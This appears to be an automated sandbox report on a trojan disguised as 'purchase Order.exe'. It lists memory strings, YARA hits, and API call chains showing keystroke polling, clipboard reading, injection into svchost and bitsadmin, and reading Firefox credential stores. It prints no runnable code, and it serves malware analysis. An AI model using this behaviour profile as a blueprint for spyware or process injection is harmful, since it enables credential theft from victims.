                Source: bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: bitsadmin.exe, 00000005.00000002.3220792547.0000000000D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: bitsadmin.exe, 00000005.00000002.3220792547.0000000000D69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: bitsadmin.exe, 00000005.00000003.1806602205.0000000007B22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: bitsadmin.exe, 00000005.00000002.3220792547.0000000000D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: bitsadmin.exe, 00000005.00000002.3220792547.0000000000D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: bitsadmin.exe, 00000005.00000002.3220792547.0000000000D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: bitsadmin.exe, 00000005.00000002.3220792547.0000000000D71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: bitsadmin.exe, 00000005.00000003.1812558902.0000000007BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C96B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00C96B0C
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C96D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00C96D07
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C96B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00C96B0C
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C82B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00C82B37

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3220556041.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3221831734.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3223837018.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1621550666.00000000036A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1621140733.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3221901716.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3222030300.0000000002E50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1622264740.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: This is a third-party compiled AutoIt script.0_2_00C43D19
                Source: purchase Order.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: purchase Order.exe, 00000000.00000000.1375066518.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e11feb40-0
                Source: purchase Order.exe, 00000000.00000000.1375066518.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_32a0643d-5
                Source: purchase Order.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f0c04a83-5
                Source: purchase Order.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e5603c5c-f
                Source: initial sampleStatic PE information: Filename: purchase Order.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042CA93 NtClose,2_2_0042CA93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B60 NtClose,LdrInitializeThunk,2_2_03772B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03772DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037735C0 NtCreateMutant,LdrInitializeThunk,2_2_037735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774340 NtSetContextThread,2_2_03774340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774650 NtSuspendThread,2_2_03774650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BF0 NtAllocateVirtualMemory,2_2_03772BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BE0 NtQueryValueKey,2_2_03772BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BA0 NtEnumerateValueKey,2_2_03772BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B80 NtQueryInformationFile,2_2_03772B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AF0 NtWriteFile,2_2_03772AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AD0 NtReadFile,2_2_03772AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AB0 NtWaitForSingleObject,2_2_03772AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F60 NtCreateProcessEx,2_2_03772F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F30 NtCreateSection,2_2_03772F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FE0 NtCreateFile,2_2_03772FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FB0 NtResumeThread,2_2_03772FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FA0 NtQuerySection,2_2_03772FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F90 NtProtectVirtualMemory,2_2_03772F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E30 NtWriteVirtualMemory,2_2_03772E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EE0 NtQueueApcThread,2_2_03772EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EA0 NtAdjustPrivilegesToken,2_2_03772EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E80 NtReadVirtualMemory,2_2_03772E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D30 NtUnmapViewOfSection,2_2_03772D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D10 NtMapViewOfSection,2_2_03772D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D00 NtSetInformationFile,2_2_03772D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DD0 NtDelayExecution,2_2_03772DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DB0 NtEnumerateKey,2_2_03772DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C70 NtFreeVirtualMemory,2_2_03772C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C60 NtCreateKey,2_2_03772C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C00 NtQueryInformationProcess,2_2_03772C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CF0 NtOpenProcess,2_2_03772CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CC0 NtQueryVirtualMemory,2_2_03772CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CA0 NtQueryInformationToken,2_2_03772CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773010 NtOpenDirectoryObject,2_2_03773010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773090 NtSetValueKey,2_2_03773090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037739B0 NtGetContextThread,2_2_037739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D70 NtOpenThread,2_2_03773D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D10 NtOpenProcessToken,2_2_03773D10
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C86685: CreateFileW,DeviceIoControl,CloseHandle,0_2_00C86685
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C7ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00C7ACC5
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C879D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00C879D3
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C6B0430_2_00C6B043
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C532000_2_00C53200
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C53B700_2_00C53B70
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C7410F0_2_00C7410F
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C602A40_2_00C602A4
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C7038E0_2_00C7038E
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C4E3B00_2_00C4E3B0
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C606D90_2_00C606D9
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C7467F0_2_00C7467F
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00CAAACE0_2_00CAAACE
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C74BEF0_2_00C74BEF
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C6CCC10_2_00C6CCC1
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C4AF500_2_00C4AF50
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C46F070_2_00C46F07
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00CA31BC0_2_00CA31BC
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C6D1B90_2_00C6D1B9
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C5B11F0_2_00C5B11F
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C7724D0_2_00C7724D
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C6123A0_2_00C6123A
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C813CA0_2_00C813CA
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C493F00_2_00C493F0
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C5F5630_2_00C5F563
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C496C00_2_00C496C0
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C8B6CC0_2_00C8B6CC
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C477B00_2_00C477B0
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C779C90_2_00C779C9
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C5FA570_2_00C5FA57
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C49B600_2_00C49B60
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C47D190_2_00C47D19
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C69ED00_2_00C69ED0
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C5FE6F0_2_00C5FE6F
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C47FA30_2_00C47FA3
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_017CE4580_2_017CE458
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004189932_2_00418993
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401ACB2_2_00401ACB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042F0B32_2_0042F0B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101D32_2_004101D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032F02_2_004032F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402A902_2_00402A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E3D32_2_0040E3D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004103F32_2_004103F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416B8E2_2_00416B8E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416B932_2_00416B93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401C402_2_00401C40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401C3A2_2_00401C3A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E51C2_2_0040E51C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E5232_2_0040E523
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402E492_2_00402E49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402E502_2_00402E50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402F192_2_00402F19
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004027202_2_00402720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA3522_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038003E62_2_038003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F02_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E02742_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C02C02_2_037C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C81582_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038001AA2_2_038001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA1182_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037301002_2_03730100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F81CC2_2_037F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D20002_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037407702_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037647502_2_03764750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C02_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C6E02_2_0375C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038005912_2_03800591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037405352_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F24462_2_037F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EE4F62_2_037EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB402_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F6BD72_2_037F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA802_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037569622_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380A9A62_2_0380A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A02_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374A8402_2_0374A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037428402_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E8F02_2_0376E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037268B82_2_037268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4F402_2_037B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760F302_2_03760F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03782F282_2_03782F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374CFE02_2_0374CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732FC82_2_03732FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BEFA02_2_037BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740E592_2_03740E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEE262_2_037FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEEDB2_2_037FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752E902_2_03752E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FCE932_2_037FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374AD002_2_0374AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373ADE02_2_0373ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03758DBF2_2_03758DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740C002_2_03740C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730CF22_2_03730CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0CB52_2_037E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372D34C2_2_0372D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F132D2_2_037F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0378739A2_2_0378739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E12ED2_2_037E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B2C02_2_0375B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037452A02_2_037452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372F1722_2_0372F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377516C2_2_0377516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374B1B02_2_0374B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380B16B2_2_0380B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F70E92_2_037F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF0E02_2_037FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EF0CC2_2_037EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037470C02_2_037470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF7B02_2_037FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F16CC2_2_037F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F75712_2_037F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DD5B02_2_037DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037314602_2_03731460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF43F2_2_037FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFB762_2_037FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B5BF02_2_037B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377DBF92_2_0377DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375FB802_2_0375FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B3A6C2_2_037B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFA492_2_037FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F7A462_2_037F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EDAC62_2_037EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DDAAC2_2_037DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03785AA02_2_03785AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037499502_2_03749950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B9502_2_0375B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D59102_2_037D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AD8002_2_037AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037438E02_2_037438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFF092_2_037FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFFB12_2_037FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03741F922_2_03741F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03749EB02_2_03749EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F7D732_2_037F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F1D5A2_2_037F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03743D402_2_03743D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375FDC02_2_0375FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B9C322_2_037B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FFCF22_2_037FFCF2
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: String function: 00C5EC2F appears 68 times
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: String function: 00C6F8A0 appears 35 times
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: String function: 00C66AC0 appears 42 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03787E54 appears 98 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03775130 appears 56 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0372B970 appears 275 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037AEA12 appears 86 times
                Source: purchase Order.exe, 00000000.00000003.1390512317.0000000004043000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs purchase Order.exe
                Source: purchase Order.exe, 00000000.00000003.1390671585.00000000041ED000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs purchase Order.exe
                Source: purchase Order.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@11/8
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C8CE7A GetLastError,FormatMessageW,0_2_00C8CE7A
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C7AB84 AdjustTokenPrivileges,CloseHandle,0_2_00C7AB84
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C7B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00C7B134
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C8E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00C8E1FD
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C86532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00C86532
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C9C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_00C9C18C
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C4406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00C4406B
                Source: C:\Users\user\Desktop\purchase Order.exeFile created: C:\Users\user\AppData\Local\Temp\aut2EA4.tmpJump to behavior
                Source: purchase Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\purchase Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: bitsadmin.exe, 00000005.00000002.3220792547.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3220792547.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.1807697503.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3220792547.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.1807843685.0000000000DA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: purchase Order.exeReversingLabs: Detection: 57%
                Source: purchase Order.exeVirustotal: Detection: 63%
                Source: unknownProcess created: C:\Users\user\Desktop\purchase Order.exe "C:\Users\user\Desktop\purchase Order.exe"
